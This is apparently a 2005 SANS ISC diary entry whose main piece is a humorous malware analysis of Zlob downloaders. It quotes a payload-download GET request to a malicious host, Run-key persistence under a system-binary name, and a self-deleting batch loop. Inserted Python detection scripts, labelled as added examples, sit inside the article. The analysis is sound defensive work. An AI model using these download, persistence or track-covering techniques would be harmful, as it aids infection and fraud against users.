Google Strangeness: Is It New?
While the consensus (our consensus... Google isn't talkin') is that Google is probably using the redirects through their site as a ranking device, there is a whole lotta' division about whether this behavior represents anything new. We're still looking into the situation.
I was talking to the Gypsy and his filthy minkey...
If you use the GreaseMonkey extension for Mozilla-based browsers, current wisdom is to disable the chimp until a fix for a remote file viewing exploit is forthcoming. More info is available at the GreaseMonkey site:
phpBB 2.0.17 released
This newest release fixes several cross-site scripting (XSS) vulnerabilities and adds some new functionality.
Tutorial for heavily modded boards:
Fellow Handler Swa Frantzen sent me a play-by-play of the upgrade:
1. Make backup
Follow the Bouncing Malware VII: Afterglow
Let's face it: not everyone is smart. There are some people in this world that can best be described as being all foam, and no beer. They are the reason for those little stickers on your hair dryer reminding you that using electrical appliances while bathing is a bad idea. ('Scuse me... You there... the one who said "It is?"... Go home. Now.) The following is for *those* people:
If, during the course of this malware tour de force, I happen to mention a website address, DO NOT GO TO THAT SITE.
Yes, *I* go to these sites. But if you read these rantings of mine closely, you'll discover something else: I'm somewhat crazy. I'm also ten foot tall and bullet-proof. And I floss.
If, despite this warning, you visit one of the sites I discuss and get infected, please write in to tell me. I can always use a good laugh.
The story thus far:
(The Reader's Digest version is below, or, you can read the full thing here: )
Joe Sixpack, the protagonist of this little stream o' consciousness, went looking on the 'Net for some "entertainment" in the form of video clips of folks repeatedly attempting procreation and other, various, athletically-challenging "events." Needless to say (but I'm saying it anyway... go figure), he found it. But, just like the Space Shuttle, when Joe was all...ahem... ready for launch, he got grounded: according to the "smorgasbord o' smut" website that he had found, he needed to load something called a "codec" onto his computer for the movin' pictures to... well... move.
Traipsing over to www.vcodec.com, Joe found just the thing: a file called "vc3_05.exe" which promised to make even the poorly lit, unevenly edited, cheesy dialogue and cheap background music of a low budget porn flick into a work of digital art.
Not one to let anything stand between him and (as the Supremes like to put it) stuff "without redeeming social importance" (and no, I wasn't talking about the ladies who sang with Diana Ross...), Joe installed that sucker lickity-split. (Note to Puritans who like to write complaint emails: That phrase only *sounds* dirty... really...)
As it turned out, however, Joe (who really *is* all foam/no beer), had actually infected himself with what is now identified as Win32.TrojanDownloader.Zlob.G, a chunk of "Yes, Master..." malware that took its marching orders from a command file downloaded from fhgstr.com. The command file directed it to download nine (count 'em nine...) more programs for Joe (gifts!). In today's installment (titled "Afterglow"), we'll track what happens to Joe's computer as it's gettin' the same thing the folks in Joe's movie are gettin'...
Notes/Feedback from FTBM VI:
1) Yes, I know I spelled eulogize wrong. It was a joke. It was a pun. A EULA is an End User... oh, never mind...
2) There is pornography on the Internet. It's no use complaining to me about it. I didn't put it there and, to the best of my knowledge, don't appear in any photos or videos.
3) Personally, I thought I handled the subject with my usual grace and dignity (i.e. none :-). For those of you who disagree, perhaps the problem is with your interpretation. I quote from one of the unsung geniuses of modern parody music:
4) No one out there recognized that the section names in FTBM VI were taken from the old-fashioned title cards in the movie "The Sting." I'm very disappointed in all of you.
While Joe is... uh... keeping busy, so is his computer. At the behest of the fine folks running fhgstr.com, Joe's computer sends out nine HTTP GET requests that it formulates based on this data:
that it downloaded in a request to "info.php" on fhgstr.com.
These nine GET requests look like this:
GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1
and, in fact, this downloads the first file, M7081700.so.
M7081700.so is a 7588 byte long executable that is, once again, packed with FSG. When it is launched, it copies itself to:
and creates two registry keys:
and populates the "run" key with a value entitled "winlogon.exe", which actually points to "msole32.exe".
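A defender's check for the persistence trick described above (a Run value named after a system binary that actually launches something else), written as an added example and not code from the diary; the Run key path, the short system-name list and the sample export are assumptions:

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: a .reg-style export of a Run key. The "winlogon.exe" value
# launching msole32.exe mirrors the trick described above; the other two entries
# are made-up contrast (one benign, one borrowing a system binary's name).
SAMPLE_RUN_EXPORT = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winlogon.exe"="C:\\WINDOWS\\system32\\msole32.exe"
"SoundMAX"="\"C:\\Program Files\\Analog Devices\\SoundMAX\\Smax4.exe\" /tray"
"svchost"="C:\\Documents and Settings\\joe\\Local Settings\\Temp\\svchost.exe"
'''

# Short illustrative lists (assumption, not exhaustive).
SYSTEM_NAMES = {"winlogon.exe", "svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows"}

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')

def parse_run_values(export_text):
    """Return {value_name: command_line} from a .reg export of a Run key."""
    values = {}
    for line in export_text.splitlines():
        m = VALUE_RE.match(line.strip())
        if m:  # .reg files escape quotes as \" and backslashes as \\
            data = m.group("data").replace('\\"', '"').replace("\\\\", "\\")
            values[m.group("name")] = data
    return values

def command_image(cmd):
    """Pull the executable path out of a command line, quoted or not."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)]
    end = cmd.lower().find(".exe")  # unquoted paths may contain spaces
    return cmd[:end + 4] if end != -1 else cmd.split(" ")[0]

def find_masquerading_entries(values):
    """Flag Run values whose name or image borrows a Windows component's name."""
    findings = []
    for name, cmd in values.items():
        image = PureWindowsPath(command_image(cmd))
        base, parent = image.name.lower(), str(image.parent).lower()
        if name.lower() in SYSTEM_NAMES and base != name.lower():
            findings.append((name, str(image), "value name does not match image"))
        elif base in SYSTEM_NAMES and parent not in SYSTEM_DIRS:
            findings.append((name, str(image), "system binary name outside a system directory"))
    return findings

if __name__ == "__main__":
    for name, image, why in find_masquerading_entries(parse_run_values(SAMPLE_RUN_EXPORT)):
        print(f"{name!r} -> {image}: {why}")
```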
Now that it has set itself up to be auto-launched at restart, it hangs in the background waiting for... well... something. I'm not really sure what triggers it, but eventually, it pops up a caution triangle containing an exclamation point in the systray, and fires up one of those cute little WinXP "notification balloon" thingies with one of several possible warnings:
Critical System Error!
Dang! Isn't that amazing? That software KNEW that Joe's PC was infected with spyware and yet in my analysis, I never saw any code that would indicate that it scanned his computer at all. Hmmm.... how could it know that?
"I am malware, therefore, you are infected"
(With sincere apologies to Rene Descartes)
Clicking on "the icon" takes you to various sub-pages of www.securityindex.net, where some fine folks who write with the same stilted grammar exhibited above, will be glad to sell you Adware Delete Cleaner (which actually, to me, sounds like it removes adware deletion software...), AntivirusGold, or Spyware Sheriff (with the optional Deputy Trojan plug-in module ;-).
And just in case you were wondering, I *always* purchase my anti-malware programs from ads that pop up on my screen...
The next piece o' malware on today's hit parade is K7111600.so, a 4,611 byte long executable that (for once!) isn't packed or obfuscated in any way.
Cracking this one open reveals a couple of interesting strings:
echo > %1
if exist %1 goto start
(note: the links have been slightly altered)
Seems that AntivirusGold is a popular product among malware authors...
The second half of those strings is actually a small DOS batch file that attempts to kill off a particular file, the name of which is passed as a command line parameter. If the file doesn't delete, it simply loops back around and tries again. Once the deletion succeeds, it then deletes itself.
This is a means used by malware authors to cover their tracks and delete their files when they complete their nefarious deeds. As you know (or perhaps you didn't), on Windows an executing file cannot be deleted: it is memory mapped by the operating system and locked against removal. By setting up a looping batch file like this, one that keeps trying to delete the main executable, the whole shootin' match disappears the moment the main program ends.
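An added example (not from the diary) of spotting this cover-your-tracks pattern in a binary's embedded strings: pull out printable runs the way the `strings` tool does, then look for a label with an `if exist ... goto` delete loop and a `del %0` self-delete. The sample bytes and the placeholder URLs are constructed.

```python
import re

# Constructed sample: stand-in bytes for a small downloader with a batch-file
# template embedded between other data (the URLs are placeholders).
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00" + b"\x00" * 16
    + b"http://example.invalid/avg.exe\x00http://example.invalid/dd.exe\x00"
    + b"\x00" * 8
    + b":start\r\ndel %1\r\nif exist %1 goto start\r\ndel %0\r\n\x00"
    + b"\xff\xfe" * 12
)

STRING_RE = re.compile(rb"[\x20-\x7e\r\n]{4,}")          # printable runs, 4+ chars
GOTO_RE = re.compile(r"^if\s+exist\s+(%\d)\s+goto\s+(\w+)\s*$", re.I)
DEL_RE = re.compile(r"^(del|erase)\s+(/\w+\s+)*(%\d)\s*$", re.I)

def extract_strings(blob):
    """Printable ASCII runs, split into individual batch-style lines."""
    lines = []
    for m in STRING_RE.finditer(blob):
        lines.extend(s.strip() for s in m.group().decode("ascii").splitlines() if s.strip())
    return lines

def _del_target(line):
    m = DEL_RE.match(line)
    return m.group(3) if m else None

def find_delete_loops(lines):
    """Report 'if exist %N goto label' loops whose label exists, and what they delete."""
    labels = {ln[1:].lower() for ln in lines if ln.startswith(":")}
    findings = []
    for i, ln in enumerate(lines):
        m = GOTO_RE.match(ln)
        if not m or m.group(2).lower() not in labels:
            continue
        param = m.group(1)
        findings.append({
            "label": m.group(2),
            "target": param,
            "deletes_target": any(_del_target(p) == param for p in lines[:i]),
            "deletes_self": any(_del_target(p) == "%0" for p in lines[i:]),
        })
    return findings

if __name__ == "__main__":
    for hit in find_delete_loops(extract_strings(SAMPLE_BLOB)):
        print(hit)
```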
What else does the main program do? Well, in this case, it downloads AntivirusGold ("avg.exe") and something called "dd.exe" from the fine folks at ex-finder.com:
avg.exe: 2,663,231 bytes
dd.exe: 36,864 bytes
I'll take a closer look at these two in a future FTBM, but for now, let's move on to another of the "gifts" being installed while Joe is... er... otherwise occupied.
DA7021900.so is 4,099 bytes of downloadin' goodness that retrieves the provocatively named "X.exe", a 14,848 byte long executable, from either 48.dapfeed.com or 773.dapfeed.com. The interesting thing here is that the file being downloaded, X.exe, is only about 10K larger than the DA7021900.so downloader... so what is the advantage of using the downloader? Obviously, it would be possible for the malware folks to substitute another file for X.exe, but at the time of writing, this ain't the brightest move they've made.
X.exe turns out to be a "dialer" program, software that modifies your dial-up connection settings so that your Internet connection is made through a 1-900-BIG-BUCKS per minute provider. Specifically, this one dials 1-900-444-0307.
So... what's the score-card look like so far? While Joe is watching his movie, he's been treated to the installation of nine pieces of software, three of which we've examined in detail:
M7081700.so - 7,588 bytes
K7111600.so - 4,611 bytes
DA7021900.so - 4,099 bytes
X7081700.so - 2,716 bytes
Z7121900.so - 2,600 bytes
A6291400.so - 34,819 bytes
HP7081700.so - 39,396 bytes
P7091300.so - 21,088 bytes
S7081700.so - 18,036 bytes
The programs that we investigated today installed:
avg.exe - 2,663,231 bytes
dd.exe - 36,864 bytes
X.exe - 14,848 bytes
Joe's dial-up connection has been whacked, and so the next time he dials out, he'll be paying phone-sex, per-minute pricing for his 'Net connection.
But he did get AntivirusGold installed on his machine for free. So how bad could it all be?
Handler on Duty: Tom Liston ( http://www.intelguardians.com )
Jul 21st 2005